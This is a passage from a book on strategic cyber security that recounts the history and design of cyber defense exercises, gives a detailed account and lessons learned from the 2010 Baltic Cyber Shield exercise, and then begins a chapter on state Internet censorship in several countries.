This chapter covers the origin and evolution of CDXs, and it describes the design, goals, and lessons learned from a recent “live-fire” international CDX, the May 2010 Baltic Cyber Shield (BCS). BCS was managed at the Cooperative Cyber Defence Cen- tre of Excellence (CCD CoE) in Tallinn, Estonia. Its virtual battlefield was designed and hosted by the Swedish Defence Research Agency (FOI) in Linköping, Sweden with the support of the Swedish National Defence College (SNDC).172 Over 100 par- ticipants hailed from across northern Europe. A robust CDX requires a team-oriented approach. There are friendly forces (Blue), hostile forces (Red), technical infrastructure (Green), and game management (White). The RT and BTs are the CDX combatants. The Green Team (GT) and White Team (WT) are non-combatants; RT attacks against either in most CDXs are strictly prohibited. 169 Occasionally, “penetration tests” are conducted against operational networks, but extreme care is always taken to avoid a real-life denial-of-service and/or the loss of sensitive data. 170 In the Internet age, Open Source Intelligence (OSINT) collection, against both people and organizations, is easier and more powerful than ever. 171 Gomes, 2003. 172 Estonian Cyber Defence League, Finnish Clarified Networks, NATO Computer Incident Response Capability-Technical Centre (NCIRC-TC), Swedish Civil Contingencies Agency (MSB) and National Defence Radio Establishment (FRA) also participated in the CDX. 52 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY BT personnel are normally real-life system administrators and computer security specialists. Their goal is to defend the confidentiality, integrity, and availability (CIA) of their computer networks against hostile RT attacks. In BCS 2010, the BTs were the primary targets for instruction; their progress was tracked by automated and manual scoring systems. The RT plays the role of a cyber attacker, or in this CDX, a “cyber terrorist.” The RT attempts to undermine the CIA of BT networks, using a variety of hacker tools and tactics.173 In a “white box” test, RTs may be given detailed, prior knowledge of the BT networks; a “black box” test requires the RT to gather this information on its own.174 Either way, RTs – just like real-life hackers – have an enormous advantage over their BT counterparts because they can often methodically work their way through vari- ous cyber attacks until they succeed in hacking the network.175 The WT manages and referees the CDX. Normally, it writes the game’s scenario, rules, and scoring system. The WT will make in-game adjustments in an effort to en- sure that all participants are gainfully employed throughout the CDX. It also seeks to prevent cheating. For example, if a particular firewall rule appeared to be detri- mental to the game and/or unrealistic in real-life, the WT may disallow it. Finally, the WT often declares a CDX “winner.” The GT is responsible for designing and hosting the CDX network infrastructure. It is the in-game “Internet Service Provider” (ISP). To allow for post-game analysis, the GT should attempt to record all CDX network traffic. With the aid of virtual machine technology, it is technically possible to carry out a CDX on a handful of computers. However, to simulate a powerful adversary, significant resources are required, and a time- and labor-intensive CDX is unavoidable. (The RT, for example, should have a plan that indicates the availability of significant money and manpower.) With Virtu- al Private Network (VPN) technology, the RT, BTs, and WT can be located anywhere in the world and remotely connect to the CDX environment. All automatic scoring in the CDX is implemented by the GT. Cyber warfare is very different from traditional warfare. Tactical victories amount to a reshuffling of the electronic bits of data – also known as ones and zeros – inside 173 Preimesberger, 2006: In the U.S., Sandia National Laboratories have developed eight “natural categories” of Red Teaming: design assurance, hypothesis testing, benchmarking, behavioral Red Teaming, gaming, operational Red Teaming, penetration testing, and analytic Red Teaming. 174 A black box is often considered more realistic because real-world hackers normally find themselves in this position. However, given strict time limits, white box CDXs are the norm. In BCS 2010, the RT had access to the initial BT network for three weeks prior to the CDX. 175 Geers, 2010: In a CDX, this depends in part on the complexity of the network the BTs have to defend and the amount of time the RT has to attack it. In the real world, hackers can often remain anonymous in cyberspace, so deterring cyber attacks is difficult. Attackers may be able to keep trying to crack a network until they succeed, and there is normally no penalty for the failed attempts. 53 Cyber Security: A Technical Primer a computer. At that point, an attacker must wait to see if any intended real-world ef- fects actually occur. A cyber attack is best understood not as an end in itself, but as an extraordinary means to a wide variety of ends: espionage,176 denial of service,177 identity theft,178 propaganda,179 and even the destruction of critical infrastructure.180 The primary goal of a CDX is to credibly simulate the attack and defense of a com- puter network. At the tactical level, the RT has the same goals as any real-world hacker – to gain unauthorized access to the target network.181 If “administrator” or “root” access is obtained, the intruder may be able to install malicious software and erase incriminating evidence at will. Further actions, possibly aimed to support some political or military goal, could range in impact from a minor annoyance to a national security crisis. The CDX “scenario” is helpful in determining the overall strategic significance of an exercise. A well-written scenario should estimate the required resources and pro- jected cost of a theoretical attack. This in turn helps national security planners to determine whether a person, group, or nation could attempt it. For example, it still remains difficult to imagine a lone hacker posing a threat to a nation-state.182 How- ever, future cyber attacks might change that perception. It is almost impossible for a limited-duration CDX to simulate the threat posed by a nation-state. Military and intelligence agencies are “full-scope” actors that do not rely solely on computer hacking to achieve an important objective. Governments draw from a deep well of expertise in many IT disciplines, including cryptogra- 176 “Tracking GhostNet...,” 2009: The most famous case to date is “GhostNet,” investigated by Information Warfare Monitor, in which a cyber espionage network of over 1,000 compromised computers in 103 countries targeted diplomatic, political, economic, and military information. 177 Keizer, 2009: During a time of domestic political crisis, hackers were able to make matters worse by knocking the entire nation-state of Kyrgyzstan offline. 178 Gorman, 2009b: American identities and software were reportedly used to attack Georgian government websites during its 2008 war with Russia. 179 Goble, 1999: Since the earliest days of the Web, Chechen guerilla fighters have demonstrated the power of Internet-enabled propaganda. “‘USA Today’ Website Hacked...” 2002: On a lighter note, a hacker placed a series of fake articles on the USA Today website. One read, “Today, George W. Bush has proposed ... a Cabinet Minister for Propoganda and Popular Englightenment [sic].... If approved, Bush would appoint Dr. Joseph Goebbels to the post.” 180 Meserve, 2007: Department of Homeland Security (DHS) officials briefed CNN that Idaho National Laboratory (INL) researchers had hacked into a replica of a power plant’s control system and changed the operating cycle of a generator, causing it to self-destruct. 181 There are exceptions, such as a denial-of-service attack in which the main goal is to overload the system with superfluous data. 182 Verton, 2002: Nonetheless, it is astonishing what some lone hackers have been able to accomplish. In 2001, “MafiaBoy,” a 15 year-old from Montreal, was able to deny Internet service to some of the world’s biggest online companies, causing an estimated $1.7 billion in damage. 54 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY phy, programming, debugging, vulnerability discovery, agent-based systems, etc.183 Those skill sets are in turn supported by experts in the natural sciences, physical security, supply chain operations, continuity of business, social engineering,184 and many more. The Sandia National Laboratories RT, based in New Mexico, provides a robust model. Sandia has a long track record of successfully hacking its clients, which include military installations, oil companies, banks, electric utilities, and e-commerce firms. Its RT takes pride in finding hidden vulnerabilities in complex environments,185 in- cluding obscure infrastructure interdependencies in highly specialized domains.186 A former Sandia RT leader put it best: “Our general method is to ask system owners: ‘What’s your worst nightmare?’ and then we set about to make that happen.”187 Every CDX is unique. There are simply too many variables in cyberspace, and IT con- tinues to evolve at an astonishing rate. Some CDXs are conducted only in a labora- tory, while others take place on real networks in the real world. For the latter, cyber defenders may be warned about the CDX before it starts, or the RT attack may come as a complete surprise. In 1997, an RT of thirty-five U.S. National Security Agency (NSA) personnel, playing the role of North Korean hackers, targeted the U.S. Pacific Command from cyber- space. The CDX, code-named Eligible Receiver, was an enormous success. James Adams wrote in Foreign Affairs that the RT was able to infect the “human com- mand-and-control system” with a “paralyzing level of mistrust,” and that “nobody in the chain of command, from the president on down, could believe anything.”188 Furthermore, Eligible Receiver was credited with revealing that a wide variety of national critical infrastructures was equally vulnerable to common hacker tools and techniques.189 Many CDXs involve a proof-of-concept. In 2006, the U.S. Environmental Protection Agency asked the Sandia RT to conduct a vulnerability assessment of every water 183 Lam et al, 2003. 184 Lawlor, 2004: Social engineering takes advantage of human weaknesses in security. Experience shows that malicious or co-opted insiders, due to the physical access they have to IT systems, can do more damage to an organization than a malicious outsider. This type of attack can be surprisingly easy to conduct against a large organization, where one does not personally know everyone in the organization. 185 For example, the production of energy – as well as the ability to attack an energy plant – can require a knowledge of systems and computer languages that is truly unique to that environment. 186 Lawlor, 2004. 187 Gibbs, 2000. 188 Adams, 2001. 189 Verton, 2003. 55 Cyber Security: A Technical Primer distribution plant serving at least 100,000 people. The fear was that a malicious hacker might be able to change the chemical composition of water enough to poison it. When the RT discovered that there were 350 such facilities in the country – far too many to examine each one – Sandia decided to conduct a thorough analysis of five sites and then construct the Risk Assessment Methodology for Water (RAM-W), which could then be used for self-assessment.190 Today, an important trend in CDXs is to encompass international partners. Because the architecture of the Internet is international in scope, Internet security is by defi- nition an international responsibility. In 2006, the U.S. Department of Homeland Security (DHS) began a bi-annual, inter- national CDX called Cyber Storm. This event specifically seeks to assess how well government agencies and the private sector can work together to thwart a cyber attack.191 The 2006 scenario simulated an attack by non-state, politically-motivated “hacktivists.”192 The 2008 Cyber Storm II193 simulated a nation-state actor that con- ducted both cyber and physical attacks on communications, chemical, railroad, and pipeline infrastructure.194 In 2010, Cyber Storm III added the compromise of trusted Internet transactions and relationships and included cyber attacks that led to the loss of life. The testing of cyber defenses is not confined to the First World. In 2009, the U.S. sponsored an international CDX in remote and mountainous Tajikistan, which in- cluded participants from Kazakhstan, Kyrgyzstan and Afghanistan.195 Baltic Cyber Shield (BCS), held on May 10-11, 2010 in numerous countries across northern Europe, was a “live-fire” CDX. A twenty-person international RT and six national BTs took part in an unscripted battle in which the use of malicious code – within the confines of a virtual battlefield196 – was both authorized and encouraged. 190 Preimesberger, 2006. 191 Verton, 2003: Market forces, deregulation, and outsourcing mean that myriad important computer networks and critical infrastructures now lie in private hands. This, combined with the reluctance of many businesses to disclose cyber attacks for fear of embarrassment, make it difficult for government to help protect the private sector. 192 Chan, 2006. 193 This CDX included eighteen federal agencies, nine U.S. states, three dozen private companies, and four foreign governments: Australia, Canada, New Zealand, and the UK. These were the same countries that took part in 2006. It is worth noting that these governments are members of a joint 1947 intelligence-sharing accord that makes it possible for them to share classified information. 194 Waterman, 2008: The RT also targeted the media in an effort to undermine public trust in government. 195 “International cyber exercise...” 2009. 196 The entire CDX took place within the bounds of a safe laboratory environment. 56 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY BCS 2010 was similar in nature to the annual CDXs that pit U.S. military services against one another197 and for which the Pentagon now sponsors a national com- petition at the high school level.198 Other CDXs that inspired aspects of BCS 2010 included the Pentagon’s International Cyber Defense Workshop (ICDW), the UCSB International Capture the Flag (iCTF), and the U.S. National Collegiate Cyber Defense Competition. The game scenario described a volatile geopolitical environment in which a hired- gun, Rapid Response Team of network security personnel defended the computer networks of a power supply company against increasingly sophisticated cyber at- tacks sponsored by a non-state, terrorist group.199 BCS 2010 had three primary goals. First, the BTs should receive hands-on experi- ence in defending computer networks containing Critical Information Infrastructure (CII) and elements of Supervisory Command and Data Acquisition (SCADA).200 Sec- ond, the CDX scenario sought to highlight the international nature of cyberspace, to include the political, institutional, and legal obstacles to improved cyber defense cooperation. Third, participating teams were meant to gain a better understanding of how to conduct CDXs in the future. The WT was based primarily at SNDC in Stockholm, Sweden, with a smaller con- tingent at CCD CoE in Tallinn, Estonia. The WT’s scoring criteria were designed to gauge the BTs’ ability to maintain the CIA of their virtual networks, including office infrastructure and external services.201 In the event of compromise, the number of points lost depended on the criticality of the system, service, or penetration. For example, if the RT gained Admin/Root-level access to a computer or compromised a SCADA Programmable Logic Controller (PLC), the BT was significantly penalized. On the other hand, BTs won positive points for thwarted attacks, for successfully 197 Caterinicchia, 2003. 198 Defense & Aerospace, 2010: In March 2010, “Team Doolittle” from Clearfield High School in Utah won the CyberPatriot II Championships, sponsored by the U.S. Air Force Air Warfare Symposium in Orlando, Florida. 199 Lewis, 2010: James Lewis of CSIS recently stated: “It remains intriguing and suggestive that [terrorists] have not launched a cyber attack. This may reflect a lack of capability, a decision that cyber weapons do not produce the violent results terrorists crave, or a preoccupation with other activities. Eventually terrorists will use cyber attacks, as they become easier to launch...” 200 SCADA systems can be used to support the management of national critical infrastructures such as the provision of electricity, water, natural gas and manufacturing. The disruption or other misuse of such systems could potentially become a national security issue. 201 Both automated and manual means were used to verify CIA. The latter, for example, could entail the WT simulating the actions of ordinary users. They may periodically request a BT webpage to see that it is reachable and not defaced. 57 Cyber Security: A Technical Primer completing in-game “business requests,”202 and for the implementation of innovative cyber defense strategies and tactics. The six BTs consisted of 6-10 personnel each, and hailed from various northern European governments, military, private sector, and academic institutions. All were provided an identical, pre-built, and somewhat insecure computer network com- posed of 20 physical PC servers running a total of 28 virtual machines.203 These were further divided into four VLAN segments – DMZ, INTERNAL, HMI,204 and PLC. The BT networks were further connected to various in-game servers that provided additional business functionality to their fictitious users. The BCS 2010 scenario called for the inclusion of SCADA software in order to simu- late a power generation company’s production, management, and distribution capa- bilities. These comprised GE PLCs, Simplicity HMI terminals, Historian databases, and two physically-separated model factories per BT network. Because of the “rapid response” nature of the BCS 2010 scenario, the BTs were given access to the CDX environment – including somewhat outdated network documenta- tion – only on day one of the CDX. They were allowed to harden their networks,205 but a minimum number and type of applications and services had to be maintained.206 The BTs were allowed to install new software and/or modify existing software. How- ever, offensive BT cyber attacks, either against the RT or against other BTs, were strictly prohibited.207 202 This aspect of the game was intended to raise the stress level of BT participants. It simulated the real- world challenge of handling both security threats and ordinary business processes at the same time. For example, a CEO may call while on a business trip, needing immediate remote access, and the BT must provide a timely solution. Alternatively, a BT member might become “ill” and have to spend one hour on “sick leave” in a break room. 203 The BTs accessed the game environment by VMWare Console from a browser or over SMB, RPC, SSH, VNC, or RDP. The power company’s network included both Windows and Linux operating systems. Unfortunately, the Console access of the free version of VMWare Server proved to be too slow and unstable for such a large event. 204 Human Machine Interface: these workstations ran the control software for the PLCs, providing the communication link between the Supervisor node and the remote factories. 205 In the real world too, new IT hires cannot assume that legacy systems are secure or even properly installed. They are likely to find some vulnerable, unpatched, redundant, etc systems. Further, existing documentation may be dated or incomplete. Once given access to the infrastructure, the BTs were allowed to disable, patch, and/or replace applications and services as long as the final configuration met CDX parameters. 206 These included HTTP, HTTPS, SMTP, DNS, FTP, IMAP/POP3, SSH, and NTP. 207 As a starting point, the BTs must stay within their countries’ legal frameworks. 58 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY The BCS RT consisted of twenty volunteers208 from throughout northern Europe.209 The RT was given access to the game environment two weeks prior to the CDX in order to simulate a degree of prior reconnaissance. To maximize the CDX’s value to all participants, the WT directed the RT to begin its attacks slowly, and to pro- gressively increase the scale and sophistication of its attacks throughout the game. Beyond that, there was no limit on the type of hacker tools and techniques that the RT could use.210 However, the RT was strictly prohibited from attacking the CDX infrastructure,211 and all attacks were confined to the virtual game environment. In- ternally, the RT divided itself into four sub-teams, depending on the hackers’ attack specialization: “client-side,” “fuzzing,” “web app,” and “remote.” The GT, based at the Swedish Defence Research Agency (FOI) in Linköping, Sweden, hosted most of the BCS 2010 infrastructure. The BT networks were designed col- laboratively by the GT and the WT. The FOI laboratory consisted of nine racks, with twenty physical servers in each rack.212 The game infrastructure included twelve, twenty centimeter tall physical models of factories, each with its own PLC, SCADA software, and “Ice Fountain” fireworks that the RT could turn on as “proof” of a suc- cessful attack. The GT provided the RT and BTs access to the game environment via OpenVPN. Finally, the WT had access to a robust visualization environment213 that displayed all network topography, network traffic flows, observer reports, chat channels, team workspaces, scoreboard, and a terrestrial map of the CDX environment.214 BCS 2010 formally began when the BTs and the RT logged into the CDX environ- ment. But the most anticipated moment arrived when the RT began its cyber attack on the BT networks. 208 The BCS 2010 RT was mostly volunteer-based. However, it is worth noting that one contractor bid to provide an RT came in at $500,000. 209 The Estonian Cyber Defence League built and managed the RT. 210 However, it is helpful if many easily-accessible, Internet-available attack tools are used, because the BTs will see these often in the real world. 211 Including the game scoring system J. 212 The servers had 2 Xeon 2.2 GHz processors, 2 GB RAM, 80 GB HDD, VMware Server 2.0.2 on Gentoo Linux, 2x Ethernet interfaces, and 2 switches, one for management and one for the game network. 213 This was provided by the Finnish company Clarified Networks. 214 In the BCS 2010 scenario, two BTs were theoretically based in South America, two in Africa, and two in Asia; the RT was in Iceland (in reality, all teams were located in northern European countries). 59 Cyber Security: A Technical Primer The RT campaign was divided into four phases: • Declaration of war • Breaching the castle wall • Owning the infrastructure • Wanton destruction The first objective, declaration of war, required the RT to “deface” the six BT public websites and to give each power company an ultimatum. In a posted statement, the “cyber warfare division” of an extremist environmental organization called “K3” demanded that the power company publicly announce its intention to convert to alternative, greener power ... or face a crippling cyber attack. The RT succeeded in defacing five of the six sites within 30 minutes. During phase one, the RT was allowed to compromise only one server in each BT DMZ and only one internal workstation in each BT network. Even with these con- straints, however, the RT succeeded in creating such a steady stream of incident reports that the WT had trouble translating all of them into negative points for the BTs. For example, within an hour the RT had established a live audio and video connection into one BT network; in other words, the game had barely begun and a digital spy was already working inside one of the power companies. In the past, a major challenge inherent in CDXs is that it has been difficult for the RT to maintain balanced and sustained pressure on all BTs throughout the game. At dif- ferent stages in a CDX, some BTs could be quite busy, while others had nothing to do. To help avoid this, the WT instructed the RT that, for each vulnerability discovered on a BT network, the RT must systematically check all other BT systems for the same vulnerability and exploit it if possible. Phase two of the K3 attack campaign called for the RT to compromise as many DMZ215 systems as possible. At the end of day one, the RT had successfully attacked 42 computers, including web and email servers. The RT leader was more than pleased with his team’s progress. Phase three called for the RT to steal the BT networks’ “crown jewels.” In BCS 2010, these were the internal network computers that served as the HMI for power gen- eration and management, i.e., its SCADA infrastructure. Although the RT was quite successful in the CDX overall, it claimed only limited victories in phase three. Of the 215 The DMZ, or demilitarized zone, is a physical or logical subnetwork that is exposed to untrusted networks, such as the Internet. 60 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY twelve model factories, the RT succeeded in setting only one of them on fire, and it is still unclear whether this RT success was intentional or accidental.216 The fourth and final phase of BCS 2010, “wanton destruction,” allowed the RT to attack and destroy any BT system in the CDX. The goal was to simulate a desperate attempt by K3 to cause maximum disruption to the power companies’ operations. Unfortunately, RT successes in this phase often denied service to the same comput- ers it had previously compromised, and it prevented the WT from scoring the game properly. In other words, a poorly-designed DoS attack can bring down large sec- tions of network infrastructure and nearly ruin the game. In this CDX, for example, the RT used a custom-configured Cisco router to simulate traffic; at one point, it created such a high volume of data that the RT denied itself access to the gamenet for 15 minutes. The RT successfully attacked several publicly-known vulnerabilities during BCS 2010, including MS03-026, MS08-067, MS10-025, and flaws in VNC, Icecast, Cla- mAV, and SQUID3. It hacked web applications such as Joomla and Wordpress and also employed SQL injection, local and remote file inclusion, path traversal, and cross-site scripting against Linux, Apache, Mysql, and PHP. Other tactics included account cracking, online brute-forcing, DoS with fuzzing tools, obtaining password hashdumps of compromised systems, and using the “pass-the-hash” technique to hack into more machines. The RT installed Poison Ivy, netcat, and custom made code as backdoors. Metasploit was used to deploy reverse backdoors. The RT modi- fied compromised systems in various ways, such as altering the victim’s crontab file to continuously drop firewall rules. Last but not least, the RT possessed a zero-day client-side exploit for virtually every browser in existence today. Although the BCS 2010 scoring system applied only to the BTs, when the game was over, the RT leader smiled as if his team had won the game. When the CDX ended, there were over 80 BT computers that were confirmed compromised. However, the BTs did adopt some successful defensive strategies. The most success- ful BT – which was also declared the winner of BCS 2010 – quickly moved essential network services, such as NTP, DNS, SMTP and WebMail, to its own custom-built, higher-security virtual machine. IPsec filtering rules were used for communications with the Domain Controller. This BT had also requested the use of an “out-of-band” communication channel for its discussions with the WT, i.e., not the in-game email system, which it assumed might be compromised. Finally, the winning BT was suc- cessful in finding and disabling preexisting GT-installed malware.217 216 The RT may have gotten lucky while examining the SCADA Modbus protocol with their fuzzing tools. 217 Preexisting malware can simulate what a Rapid Response Team would likely find on any computer network. 61 Cyber Security: A Technical Primer BCS 2010 also highlighted the value of numerous current OS-hardening tools and techniques. For Linux computers, these included AppArmor, Samhain, and custom short shell scripts; for Windows, Active Directory (AD) group policies, the CIS SE46 Computer Integrity System, Kernel Guard, and the central collection of event logs. For all OSs, the white/black-listing and blocking/black hole-routing of offending IP addresses, on a case-by-case basis, proved invaluable. The Cooperative Cyber Defence Centre of Excellence (CCD CoE), the Swedish Nation- al Defence College (SNDC) and the Swedish Defence Research Agency (FOI) believe that BCS 2010 accomplished its three primary goals. First, the GT network infrastructure provided a sufficiently robust environment for a rare “live fire” CDX that offered six professional BTs the opportunity to defend CII and SCADA-enabled computer networks against a highly-motivated, capable RT. All teams were fully occupied throughout the two-day exercise, and very little down- time was reported. Further, the BCS 2010 scenario described a “cyber terrorist” threat that may already endanger the national security of governments around the world.218 Second, BCS 2010 was a truly international exercise. Because cyber attacks can be launched from anywhere in the world and are likely to traverse third-party coun- tries en route to a target, it is critical to develop cross-border relationships before an international crisis occurs. In BCS 2010, over 100 personnel from seven coun- tries participated. Numerous international partnerships were either established or strengthened during the course of this project. Third, BCS 2010 conducted a post-exercise participant survey with a view toward providing a list of lessons learned to future CDXs around the world.219 Here are the highlights: • There should be at least one WT member per BT and two WT members on the RT to allow for sufficient observation, communication, adjudication, and clarification on scoring. • The WT should include a cyber-savvy lawyer to shed light on the legality of unscripted attack and defense scenarios. • Each BT must have at least one full-time WT-appointed “dumb user” active on the virtual network to make client-side attacks possible.220 In BCS 2010, the 218 “Remarks...” 2009; Cyber War...” 2009. 219 The author gave a BCS 2010 presentation at DEF CON 18: www.defcon.org/html/links/dc-archives/ dc-18-archive.html#Geers. 220 This cannot be an integral BT member due to the obvious conflict of interest. 62 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY RT did not have the chance to use a powerful “zero-day” browser exploit with which they had intended to target the virtual power company employees. • Prior to a “live-fire” CDX, all participants should devote one full day to testing connectivity, bandwidth, passwords, cryptographic keys, etc., and for clarifica- tion on rules and scoring. • The VMWare Server Console was too slow for the high demands BCS 2010 placed upon it, and it cannot be recommended to other CDXs. • The WT/GT should grant the BTs some network administration rights over their physical machines in the CDX environment. Otherwise, installing and patching software can be too time-consuming. • A “wanton destruction” phase (i.e., one without a clearly defined purpose and certain limits on the RT) will likely destroy the game itself and so for most CDX scenarios cannot be recommended. • In a project this big, some egos and agendas are bound to clash. It is important to designate diplomatic yet authoritative personalities, who can meet team- oriented deadlines, from the beginning. Finally, one of the lessons of BCS 2010 is that many of the challenges inherent in conducting a robust CDX mirror the challenges of managing both IT and cyber secu- rity in the real world. Cyberspace is complicated, polymorphic, dynamic, and evolv- ing quickly. Cyber defenders may never see the same attack twice. Furthermore, the intangible nature of cyberspace can make the calculation of victory, defeat, and battle damage a highly subjective undertaking. Therefore, believe it or not, both in the laboratory and in the real world, even knowing whether one is under cyber at- tack can be a challenge. Chapter 3 has introduced the reader to the highly technical nature of cyber security at the tactical level. Chapter 4 will show how cyber attacks have impacted the real world, even at the strategic level. 63 Cyber Security: Real-World Impact 4. CYBER SECURITY: REAL-WORLD IMPACT Chapter 3 described a wide range of technical challenges to securing the Inter- net and revealed that even our national critical infrastructures are at risk. But it is always important to correlate theoretical discussion with real-world events. Have cyber attacks truly had an influence at the highest levels of government? To what extent have they impacted national security? Cyber Security and Internal Political Security221 National security begins at home. No government can worry about foreign threats or adventures before it feels secure within its own borders. In terms of domestic security, a major consideration for many governments is infor- mation management, if not information control. The most famous example comes from fiction. In 1949, in his novel Nineteen Eighty-Four George Orwell imagined a government that waged full-time information warfare against its own citizens, with the aid of two-way Internet-like “telescreens.”222 Unfortunately, in 2011 some countries are not far from Orwell’s vision, and media carry only stories that are carefully crafted by government censors. For example, in North Korea, the world’s most repressive and isolated country, the perceived threat to stability from unrestricted access to the Internet is prohibitively high. Television and radio carry only government channels, and there is an Orwellian “national inter- com” wired into residences and workplaces throughout the country through which the government provides information to its citizens. North Korea’s aging leader, Kim Jong-il, is said to be fascinated with the IT revolu- tion. In 2000, he gave visiting U.S. Secretary of State Madeleine Albright his per- sonal email address. However, computers are unavailable to ordinary North Korean citizens, and it is believed that only a small circle of North Korean leadership have free access to the Internet. 221 This chapter consists of an updated section from a 2007 paper, “Greetz from Room 101,” written and presented by the author at DEF CON 15 and Black Hat. It contains material from Reporters without Borders (www.rsf.org), OpenNet Initiative (www.opennet.net), Freedom House (www.freedomhouse. org), Electronic Frontier Foundation (www.eff.org), ITU Digital Access Index (www.itu.int), and Central Intelligence Agency (www.cia.gov). For example, RSF assessments are based on a combination of “murders, imprisonment or harassment of cyber-dissidents or journalists, censorship of news sites, existence of independent news sites, existence of independent ISPs, and deliberately high connection charges.” 222 Orwell, 2003 (originally written in 1949). 64 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Each year, one hundred male students as young as 8 years old are chosen to at- tend the Kumsong computer school, where the curriculum consists of computer programming and English. The students are not allowed to play games or access the Internet, but they do have an instant messaging system within the school. According to the South Korean Chief of Military Intelligence, some top graduates from the Kim Il-Sung Military Academy have been selected for an elite, state-spon- sored hacker unit, where they develop “cyber-terror” operations. International Internet connections run from North Korea to the rest of the world via Moscow and Beijing. They are managed at the Korea Computer Centre (KCC), estab- lished in 1990. Reports suggest that KCC downloads officially-approved research and development data, which it offers to a very short list of clients. North Korea’s official stance on Internet connectivity is that the government cannot tolerate the “spiritual pollution” of its country. However, South Korea determined that North Korea was operating a state-run cyber casino on a South Korean IP ad- dress. Since that time, South Korean companies have been barred from registering North Korean sites without government approval. According to recent statistics, North Korea is 48th in the world in population at 24.5 million. However, the country possesses only three computers which are directly connected to the Internet, so it sits at number 227 in the world in that category.223 North Korea is not alone in fearing the power of the Internet to undermine its do- mestic security. In Turkmenistan, President-for-Life Saparmurat Niyazov – the Turk- menbashi, or Father of All – died in late 2006, but his personality cult and the tightly-controlled media he left behind have had a lasting impact on the country. Information and communication technology is woefully underdeveloped. The Turk- mentelekom monopoly has allowed almost no Internet access, either from home or via cyber café. A few Turkmen organizations have been allowed to access just a handful of officially-approved websites. In 2001, of all the countries of the former Soviet Union, Turkmenistan had the fewest number of IT-certified personnel – fifty- eight. In addition, the CIA reported in 2005 that there were only 36,000 Internet users, out of a population of 5 million. In 2006, a Turkmen journalist who had worked with Radio Free Europe died in prison, only three months after being jailed. Despite repeated European Union (EU) demands, there has been no investigation into the incident. 223 CIA World Factbook, 9 March, 2011. 65 Cyber Security: Real-World Impact Foreign embassies and non-governmental organizations furnish their own Internet access. In the past they have offered access to ordinary Turkmen, but it was too dangerous for the average citizen to accept the offer. Following Niyazov’s death, Gurbanguli Berdymukhamedov was elected president224 with a campaign promise to allow unrestricted access to the Internet. And within days, two cyber cafés opened in the capital. A visiting AP journalist reported easy access to international news sites, including those belonging to Turkmen political opposition groups. However, the price per hour was $4, exorbitant in a country where monthly income is under $100. Today, Turkmenistan has a population of 5 million. Unfortunately, under 100,000, or under 2%, are believed to have Internet access.225 On the bright side, computer hardware is available in Turkmenistan, and computer gaming is popular. Also, the use of satellite TV is on the rise, which could be used to improve Internet connectiv- ity in the future. The world’s largest and most sophisticated Internet surveillance belongs to the Peo- ple’s Republic of China (PRC), which employs an army of public and private226 cyber security personnel to keep watch over its citizens. The PRC has strict controls on access to the World Wide Web, and policemen are stationed at cyber cafés, which track patrons’ usage for 60 days. The “Great Firewall” is designed specifically to prevent the free flow of information in and out of the country, including content related to politics, human rights, reli- gion, and pornography. Some sites, such as Google and BBC, have been completely blocked for a period of time. Search results are believed to be filtered by keyword at the national gateway and not by web browsers in China. The high level of sophistication in Chinese Internet surveillance is evident by the fact that some URLs have been blocked, even while corresponding top level domains (TLD) are accessible and webpage content appears consistent across the domain. This suggests active human participation in state censorship (i.e., the system is not completely automated). At the extreme end, some blog entries appear to have been edited by censors and reposted to the Web. 224 This election was not monitored by international observers. 225 CIA World Factbook, 9 March, 2011. 226 Some Western companies have been accused of too much cooperation with China on cyber control issues: Google, Yahoo, and Microsoft have all collaborated in government prosecutions. 66 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Comprehensive laws authorize government control of the media, while individual privacy statutes are unclear, in short supply, and perhaps even inapplicable in terms of information and communications technology (ICT).227 In 2007, Chinese President Hu Jintao called for a “purification” of the Internet, sug- gesting that Beijing intended to tighten its control over computer networks even further. According to Hu, new technologies such as blogging and webcasting had allowed Chinese citizens to circumvent state controls, which had negatively affected the “development of socialist culture,” the “security of information,” and the “stabil- ity of the state.” Today, China is on the cutting edge of Internet technology research. In particular, it has invested heavily in Internet Protocol version 6 (IPv6), which could be used to support a long-term strategy of user control. PRC Internet Society chairwoman Hu Qiheng has stated that China’s goal is to achieve a state of “no anonymity” in cyberspace. China’s fear of Internet freedom is shared by Cuba, whose highly educated popula- tion lacks regular access to the web. Special authorization is required to buy com- puter hardware, and Internet connection codes must be obtained from the govern- ment. This has led to a healthy cyber black market; for example, students have been expelled from school for trading in connection codes. Some Cubans have connected to the Internet from the homes of expatriates, who have in turn been threatened by the police with expulsion from the country. Cuban Decree-Law 209, written in 1996, states that “access from the Republic of Cuba to the Global Computer Network” may not violate “moral principles” or “jeop- ardize national security.” Illegal network connections can earn a prison sentence of five years, posting a counter-revolutionary article, 20 years. At least two dozen journalists are now serving up to 27 years in prison. As governments grow more familiar with censorship technology, they are capable of more complex decision-making. For example, at a 2006 Non-Aligned Movement summit in Havana, conference attendees had no problem connecting to the web. However, in the same year, when a human rights activist in the small village of Vi- ñales tried to open an email from Reporters Without Borders containing the names 227 However, in Asia, it is generally accepted that there is less privacy in one’s daily life, and the general populace is more comfortable with government oversight than in the West. 67 Cyber Security: Real-World Impact of Cuban dissidents, a pop-up window announced: “This programme will close down in a few seconds for state security reasons.”228 Recent statistics indicate that around 15% of Cuba’s population of 11 million is now online. However, there are only about 3,000 Internet-connected computers on the island, which is an extremely low number for 1.5 million users.229 Obviously, such a narrow funnel would make it easier for the government to monitor web communica- tions. Burma presents another extreme example of Internet paranoia. Out of a population of 50 million, only 78,000, or 0.6% of citizens, now use the web. The number of Internet-connected host computers in the country is just 42. A few cyber cafés exist, but they require name, identification number, address, and frequent screenshots of user activity to log in. Thus, online privacy is non-existent. In Burma, average citizens access not the Internet per se, but the “Myanmar Inter- net,” which hosts only a small number of officially-sanctioned business websites. Furthermore, only state-sponsored email accounts are allowed; commercial web- mail is prohibited. One of the most common ways to deny Internet access is to make it prohibitively expensive. The Burmese average annual income is $225. A broadband connection is $1,300. Dial-up, the most common form of access, is $6 for 10 hours; outside the cities of Rangoon and Mandalay, long distance fees are also required. Entrance to a cyber café is $1.50. According to the 1996 Computer Science Development Law, all network-ready com- puters must be registered with the government. Failure to do so or sharing an In- ternet connection with another person carries penalties of 